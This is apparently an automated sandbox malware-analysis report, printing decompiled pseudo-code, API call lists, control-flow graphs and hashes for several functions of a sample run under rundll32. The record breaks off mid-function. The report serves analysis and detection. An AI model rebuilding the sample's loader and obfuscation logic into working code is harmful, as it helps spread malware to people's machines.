                                                  0x052d6a86
                                                  0x052d6a8b
                                                  0x052d6a92
                                                  0x052d6a94
                                                  0x052d6a99
                                                  0x052d6a9f
                                                  0x052d6aa5
                                                  0x052d6aaf
                                                  0x052d6ab3
                                                  0x052d6ab5
                                                  0x052d6aba
                                                  0x052d6abb
                                                  0x052d6abc
                                                  0x052d6ac1
                                                  0x052d6ac7
                                                  0x052d6ad0
                                                  0x052d6ad1
                                                  0x052d6ad6
                                                  0x052d6adc
                                                  0x052d6ae8
                                                  0x052d6aea
                                                  0x052d6aea
                                                  0x052d6af4
                                                  0x052d6af4
                                                  0x052d6a78
                                                  0x052d6a7a
                                                  0x052d6a7a
                                                  0x052d6afe

                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,052D807D,?), ref: 052D6A69
                                                  • GetTickCount.KERNEL32 ref: 052D6A7D
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,052D807D,?), ref: 052D6A99
                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,052D807D,?), ref: 052D6A9F
                                                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 052D6ABC
                                                  • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,052D807D,?), ref: 052D6AD6
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                  • String ID:
                                                  • API String ID: 507476733-0
                                                  • Opcode ID: ee686473559d0bba7a5f9af6e284f95be9337f9c1857e3540c6c52b53691bd95
                                                  • Instruction ID: 1356d8aea7593bdf70fd16b833a6d548a3929ad1389479c396c0dfa6bef3f5e2
                                                  • Opcode Fuzzy Hash: ee686473559d0bba7a5f9af6e284f95be9337f9c1857e3540c6c52b53691bd95
                                                  • Instruction Fuzzy Hash: 7D118A72B642016FD7109B64EC0EB6ABA99EF44761F108529F549D61C0EAB4E840C671
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D225B, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 143 52d225b-52d2276 call 52d550e 146 52d228c-52d229a 143->146 147 52d2278-52d2286 143->147 149 52d22ac-52d22c7 call 52d3d0d 146->149 150 52d229c-52d229f 146->150 147->146 156 52d22c9-52d22cf 149->156 157 52d22d1 149->157 150->149 151 52d22a1-52d22a6 150->151 151->149 153 52d242d 151->153 155 52d242f-52d2435 153->155 158 52d22d7-52d22ec call 52d1bf4 call 52d1b2f 156->158 157->158 163 52d22ee-52d22f1 CloseHandle 158->163 164 52d22f7-52d22fc 158->164 163->164 165 52d22fe-52d2303 164->165 166 52d2322-52d233a call 52d2049 164->166 168 52d2419-52d241d 165->168 169 52d2309 165->169 174 52d233c-52d2364 memset RtlInitializeCriticalSection 166->174 175 52d2366-52d2368 166->175 171 52d241f-52d2423 168->171 172 52d2425-52d242b 168->172 173 52d230c-52d231b call 52da501 169->173 171->155 171->172 172->155 181 52d231d 173->181 177 52d2369-52d236d 174->177 175->177 177->168 180 52d2373-52d2389 RtlAllocateHeap 177->180 182 52d23b9-52d23bb 180->182 183 52d238b-52d23b7 wsprintfA 180->183 181->168 184 52d23bc-52d23c0 182->184 183->184 184->168 185 52d23c2-52d23e2 call 52d269c call 52d4094 184->185 185->168 190 52d23e4-52d23eb call 52d96a4 185->190 193 52d23ed-52d23f0 190->193 194 52d23f2-52d23f9 190->194 193->168 195 52d240e-52d2412 call 52d6786 194->195 196 52d23fb-52d23fd 194->196 200 52d2417 195->200 196->168 197 52d23ff-52d2403 call 52d3dd9 196->197 201 52d2408-52d240c 197->201 200->168 201->168 201->195
                                                  C-Code - Quality: 57%
                                                  			E052D225B(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E052D550E();
				if(_t21 != 0) {
					_t59 =  *0x52dd25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x52dd25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x52dd164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E052D3D0D( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x52dd27c; // 0x202a5a8
					if( *0x52dd25c > 5) {
						_t8 = _t26 + 0x52de5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x52dea15; // 0x44283a44
						_t27 = _t7;
					}
					E052D1BF4(_t27, _t27);
					_t31 = E052D1B2F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x52dd270 =  *0x52dd270 ^ 0x81bbe65d;
						_t32 = E052D2049(0x60);
						__eflags = _t32;
						 *0x52dd32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x52dd32c; // 0x73095b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x52dd32c; // 0x73095b0
							 *_t51 = 0x52de836;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x52dd238, 0, 0x43);
							__eflags = _t36;
							 *0x52dd2c4 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x52dd25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x52dd27c; // 0x202a5a8
								_t13 = _t58 + 0x52de55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x52dc2a7);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E052D269C( ~_v8 &  *0x52dd270, 0x52dd00c); // executed
								_t42 = E052D4094(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E052D96A4(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E052D6786(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E052D3DD9(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x52dd160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E052DA501(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                                  0x052d225b
                                                  0x052d2266
                                                  0x052d2269
                                                  0x052d226c
                                                  0x052d226f
                                                  0x052d2276
                                                  0x052d2278
                                                  0x052d2284
                                                  0x052d2286
                                                  0x052d2286
                                                  0x052d228f
                                                  0x052d2297
                                                  0x052d229a
                                                  0x052d22b4
                                                  0x052d22c0
                                                  0x052d22c2
                                                  0x052d22c7
                                                  0x052d22d1
                                                  0x052d22d1
                                                  0x052d22c9
                                                  0x052d22c9
                                                  0x052d22c9
                                                  0x052d22c9
                                                  0x052d22d8
                                                  0x052d22e5
                                                  0x052d22ec
                                                  0x052d22f1
                                                  0x052d22f1
                                                  0x052d22f9
                                                  0x052d22fc
                                                  0x052d2322
                                                  0x052d232e
                                                  0x052d2333
                                                  0x052d2335
                                                  0x052d233a
                                                  0x052d2366
                                                  0x052d2368
                                                  0x052d233c
                                                  0x052d2340
                                                  0x052d2345
                                                  0x052d234a
                                                  0x052d2351
                                                  0x052d2357
                                                  0x052d235c
                                                  0x052d2362
                                                  0x052d2369
                                                  0x052d236b
                                                  0x052d236d
                                                  0x052d237c
                                                  0x052d2382
                                                  0x052d2384
                                                  0x052d2389
                                                  0x052d23b9
                                                  0x052d23bb
                                                  0x052d238b
                                                  0x052d238b
                                                  0x052d2391
                                                  0x052d239e
                                                  0x052d23a4
                                                  0x052d23a4
                                                  0x052d23ac
                                                  0x052d23b5
                                                  0x052d23bc
                                                  0x052d23be
                                                  0x052d23c0
                                                  0x052d23c7
                                                  0x052d23d4
                                                  0x052d23d9
                                                  0x052d23de
                                                  0x052d23e0
                                                  0x052d23e2
                                                  0x00000000
                                                  0x00000000
                                                  0x052d23e4
                                                  0x052d23e9
                                                  0x052d23eb
                                                  0x052d23f2
                                                  0x052d23f6
                                                  0x052d23f9
                                                  0x052d240e
                                                  0x052d2412
                                                  0x052d2417
                                                  0x00000000
                                                  0x052d2417
                                                  0x052d23fb
                                                  0x052d23fd
                                                  0x00000000
                                                  0x00000000
                                                  0x052d2403
                                                  0x052d2408
                                                  0x052d240a
                                                  0x052d240c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x052d240c
                                                  0x052d23ef
                                                  0x052d23ef
                                                  0x052d23c0
                                                  0x052d22fe
                                                  0x052d22fe
                                                  0x052d2303
                                                  0x052d2419
                                                  0x052d241d
                                                  0x052d2425
                                                  0x052d2425
                                                  0x00000000
                                                  0x052d241d
                                                  0x052d2309
                                                  0x052d230c
                                                  0x052d2316
                                                  0x052d231d
                                                  0x00000000
                                                  0x052d242d
                                                  0x052d242d
                                                  0x052d2431
                                                  0x052d2435
                                                  0x052d2435

                                                  APIs
                                                    • Part of subcall function 052D550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,052D2274,00000000,00000000), ref: 052D551D
                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 052D22F1
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • memset.NTDLL ref: 052D2340
                                                  • RtlInitializeCriticalSection.NTDLL(07309570), ref: 052D2351
                                                    • Part of subcall function 052D3DD9: memset.NTDLL ref: 052D3DEE
                                                    • Part of subcall function 052D3DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 052D3E22
                                                    • Part of subcall function 052D3DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 052D3E2D
                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 052D237C
                                                  • wsprintfA.USER32 ref: 052D23AC
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 4246211962-0
                                                  • Opcode ID: 153ca2791f740ac308fd92b72006689daf45f71af49d2ff8c0f80b2d42cc51d5
                                                  • Instruction ID: 15242761887a57184e34660efbb94dcccd1d107aaff2fbf7878ebd0f99a0da4b
                                                  • Opcode Fuzzy Hash: 153ca2791f740ac308fd92b72006689daf45f71af49d2ff8c0f80b2d42cc51d5
                                                  • Instruction Fuzzy Hash: 7851C275E35616EBDB219BA4EC4DE6EBBA9BF04710F004426F906E7181EAB499408B70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D94A9, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 202 52d94a9-52d94bc 203 52d94c3-52d94c7 StrChrA 202->203 204 52d94be-52d94c2 203->204 205 52d94c9-52d94da call 52d2049 203->205 204->203 208 52d94dc-52d94e8 StrTrimA 205->208 209 52d951f 205->209 210 52d94ea-52d94f3 StrChrA 208->210 211 52d9521-52d9528 209->211 212 52d9505-52d9511 210->212 213 52d94f5-52d94ff StrTrimA 210->213 212->210 214 52d9513-52d951d 212->214 213->212 214->211
                                                  C-Code - Quality: 53%
                                                  			E052D94A9(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E052D2049(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x52dc2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x52dc2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                  0x052d94b4
                                                  0x052d94b8
                                                  0x052d94ba
                                                  0x052d94bb
                                                  0x052d94c3
                                                  0x052d94c3
                                                  0x052d94c7
                                                  0x00000000
                                                  0x00000000
                                                  0x052d94be
                                                  0x052d94bf
                                                  0x052d94c2
                                                  0x052d94c2
                                                  0x052d94cf
                                                  0x052d94d6
                                                  0x052d94da
                                                  0x052d94e2
                                                  0x052d94e8
                                                  0x052d94ea
                                                  0x052d94ef
                                                  0x052d94f3
                                                  0x052d94f5
                                                  0x052d94f8
                                                  0x052d94ff
                                                  0x052d94ff
                                                  0x052d9509
                                                  0x052d950c
                                                  0x052d950f
                                                  0x052d950f
                                                  0x052d951b
                                                  0x052d951b
                                                  0x052d9528

                                                  APIs
                                                  • StrChrA.SHLWAPI(?,00000020,00000000,073095AC,?,052D23DE,?,052D7634,073095AC,?,052D23DE), ref: 052D94C3
                                                  • StrTrimA.KERNELBASE(?,052DC2A4,00000002,?,052D23DE,?,052D7634,073095AC,?,052D23DE), ref: 052D94E2
                                                  • StrChrA.SHLWAPI(?,00000020,?,052D23DE,?,052D7634,073095AC,?,052D23DE), ref: 052D94ED
                                                  • StrTrimA.SHLWAPI(00000001,052DC2A4,?,052D23DE,?,052D7634,073095AC,?,052D23DE), ref: 052D94FF
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Trim
                                                  • String ID:
                                                  • API String ID: 3043112668-0
                                                  • Opcode ID: ffb70c58790d4a2ffb0033725889bdde659c152e9dfa079e55a3dd9999032f80
                                                  • Instruction ID: 3c302a714e3dd772f8b78b437f8394573b1825021df2c96b8660c7175bc1bf3b
                                                  • Opcode Fuzzy Hash: ffb70c58790d4a2ffb0033725889bdde659c152e9dfa079e55a3dd9999032f80
                                                  • Instruction Fuzzy Hash: 030152716293265FD3219E69DC4DF37FF9CFF856A0F110519F985D7241DA60C80186B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D3DD9, Relevance: 3.9, APIs: 3, Instructions: 155stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 90%
                                                  			E052D3DD9(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x52dd27c; // 0x202a5a8
				_t5 = _t40 + 0x52dee40; // 0x410025
				_t85 = E052D6A12(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E052D9039(_v16);
					goto L24;
				}
				if(E052DA72D(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E052D809F(0,  *0x52dd33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0x52dd27c; // 0x202a5a8
					_t11 = _t52 + 0x52de81a; // 0x65696c43
					_t55 = E052D809F(0, _t11);
					_t87 = _t55;
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E052D6BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E052D9039(_t87);
					}
					if(_t80 != 0) {
						L17:
						E052D9039(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E052D1F99(_t86);
						}
						goto L22;
					} else {
						if(( *0x52dd260 & 0x00000001) == 0) {
							L14:
							E052D8F83(_t80, _v88, _v84,  *0x52dd270, 0);
							_t80 = E052D1C74(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E052D42EA( &_v40, 0);
							}
							E052D9039(_v88);
							goto L17;
						}
						_t67 =  *0x52dd27c; // 0x202a5a8
						_t18 = _t67 + 0x52de823; // 0x65696c43
						_t70 = E052D809F(0, _t18);
						_t89 = _t70;
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E052D6BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E052D9039(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}


























                                                  0x052d3deb
                                                  0x052d3dee
                                                  0x052d3df5
                                                  0x052d3dfb
                                                  0x052d3dfc
                                                  0x052d3dfd
                                                  0x052d3dfe
                                                  0x052d3dff
                                                  0x052d3e00
                                                  0x052d3e08
                                                  0x052d3e14
                                                  0x052d3e18
                                                  0x052d3e1b
                                                  0x052d3f6b
                                                  0x052d3f6e
                                                  0x052d3f72
                                                  0x052d3f72
                                                  0x052d3e2d
                                                  0x052d3e35
                                                  0x052d3f5e
                                                  0x052d3f5f
                                                  0x052d3f62
                                                  0x00000000
                                                  0x052d3f62
                                                  0x052d3e47
                                                  0x052d3e49
                                                  0x052d3e49
                                                  0x052d3e54
                                                  0x052d3e5b
                                                  0x052d3e5e
                                                  0x052d3f4d
                                                  0x00000000
                                                  0x052d3e64
                                                  0x052d3e64
                                                  0x052d3e69
                                                  0x052d3e72
                                                  0x052d3e77
                                                  0x052d3e80
                                                  0x052d3ea3
                                                  0x052d3e82
                                                  0x052d3e98
                                                  0x052d3e9a
                                                  0x052d3e9a
                                                  0x052d3ea6
                                                  0x052d3f41
                                                  0x052d3f44
                                                  0x052d3f4e
                                                  0x052d3f4e
                                                  0x052d3f53
                                                  0x052d3f55
                                                  0x052d3f55
                                                  0x00000000
                                                  0x052d3eac
                                                  0x052d3eb3
                                                  0x052d3ef4
                                                  0x052d3f05
                                                  0x052d3f1b
                                                  0x052d3f1f
                                                  0x052d3f24
                                                  0x052d3f2a
                                                  0x052d3f37
                                                  0x052d3f37
                                                  0x052d3f3c
                                                  0x00000000
                                                  0x052d3f3c
                                                  0x052d3eb5
                                                  0x052d3eba
                                                  0x052d3ec3
                                                  0x052d3ec8
                                                  0x052d3ecc
                                                  0x052d3eef
                                                  0x052d3ece
                                                  0x052d3ee4
                                                  0x052d3ee6
                                                  0x052d3ee6
                                                  0x052d3ef2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x052d3ef2
                                                  0x052d3ea6

                                                  APIs
                                                  • memset.NTDLL ref: 052D3DEE
                                                    • Part of subcall function 052D6A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,052D3E14,00410025,00000005,?,00000000), ref: 052D6A23
                                                    • Part of subcall function 052D6A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 052D6A40
                                                  • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 052D3E22
                                                  • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 052D3E2D
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                  • String ID:
                                                  • API String ID: 3817122888-0
                                                  • Opcode ID: af589a2427fd0e3f6cfda11b67cdb5478732abb551cc71c54a4ca7fc24fb4cef
                                                  • Instruction ID: 91c2eaea0ab45a0d6ba37669e67ecfa5c857255320be12b304d94631f5743759
                                                  • Opcode Fuzzy Hash: af589a2427fd0e3f6cfda11b67cdb5478732abb551cc71c54a4ca7fc24fb4cef
                                                  • Instruction Fuzzy Hash: 27416C72A2121DAFDB11EFE4DC88DAEFBBDBF18250F004525F905EA150DA71DA448BB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D8055, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 271 52d8055-52d8060 272 52d8085-52d8092 InterlockedDecrement 271->272 273 52d8062-52d8063 271->273 274 52d8099-52d809c 272->274 276 52d8094 call 52d970f 272->276 273->274 275 52d8065-52d8072 InterlockedIncrement 273->275 275->274 277 52d8074-52d8078 call 52d6a56 275->277 276->274 280 52d807d-52d807f 277->280 280->274 281 52d8081-52d8083 280->281 281->274
                                                  C-Code - Quality: 100%
                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x52dd23c) == 0) {
						E052D970F();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x52dd23c) == 1) {
						_t10 = E052D6A56(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                  0x052d805c
                                                  0x052d805d
                                                  0x052d8060
                                                  0x052d8092
                                                  0x052d8094
                                                  0x052d8094
                                                  0x052d8062
                                                  0x052d8063
                                                  0x052d8078
                                                  0x052d807f
                                                  0x052d8081
                                                  0x052d8081
                                                  0x052d807f
                                                  0x052d8063
                                                  0x052d809c

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(052DD23C), ref: 052D806A
                                                    • Part of subcall function 052D6A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,052D807D,?), ref: 052D6A69
                                                  • InterlockedDecrement.KERNEL32(052DD23C), ref: 052D808A
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                  • String ID:
                                                  • API String ID: 3834848776-0
                                                  • Opcode ID: 145ec91f339ecc1e657ec45e62a2e18ad682db9a97aa1500a03531346f8da1e7
                                                  • Instruction ID: 893ce5e1525bc1d2615f086a84c9769a5dcecde2c7f1173f9ac41314e240237a
                                                  • Opcode Fuzzy Hash: 145ec91f339ecc1e657ec45e62a2e18ad682db9a97aa1500a03531346f8da1e7
                                                  • Instruction Fuzzy Hash: 51E04F753782225786317B749C0CF7EEA52BF20A92F198514F6CDD4090CA60C8809AF1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D73FD, Relevance: 2.6, APIs: 2, Instructions: 94memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 282 52d73fd-52d7410 call 52da72d 284 52d7415-52d7417 282->284 285 52d741c-52d743e call 52d1262 284->285 286 52d7419 284->286 289 52d74fd-52d7502 285->289 290 52d7444-52d745e 285->290 286->285 291 52d7509-52d750f 289->291 292 52d7504 call 52d1f99 289->292 295 52d74ed-52d74ef 290->295 296 52d7464-52d7480 call 52d7cb8 290->296 292->291 297 52d74f0-52d74fb HeapFree 295->297 296->297 300 52d7482-52d749b call 52d89d6 296->300 297->289 303 52d74bd-52d74eb call 52d2659 HeapFree 300->303 304 52d749d-52d74a4 300->304 303->297 304->303 305 52d74a6-52d74b8 call 52d89d6 304->305 305->303
                                                  C-Code - Quality: 87%
                                                  			E052D73FD(void* __edx) {
				char _v8;
				char _v12;
				void* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E052DA72D(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x52dd27c; // 0x202a5a8
				_t4 = _t24 + 0x52dede0; // 0x7309388
				_t5 = _t24 + 0x52ded88; // 0x4f0053
				_t45 = E052D1262( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					 *0x52dd0f4(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x52dd27c; // 0x202a5a8
						_t11 = _t32 + 0x52dedd4; // 0x730937c
						_t48 = _t11;
						_t12 = _t32 + 0x52ded88; // 0x4f0053
						_t55 = E052D7CB8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x52dd27c; // 0x202a5a8
							_t13 = _t35 + 0x52dee1e; // 0x30314549
							if(E052D89D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0x52dd25c - 6;
								if( *0x52dd25c <= 6) {
									_t42 =  *0x52dd27c; // 0x202a5a8
									_t15 = _t42 + 0x52dec2a; // 0x52384549
									E052D89D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x52dd27c; // 0x202a5a8
							_t17 = _t38 + 0x52dee18; // 0x73093c0
							_t18 = _t38 + 0x52dedf0; // 0x680043
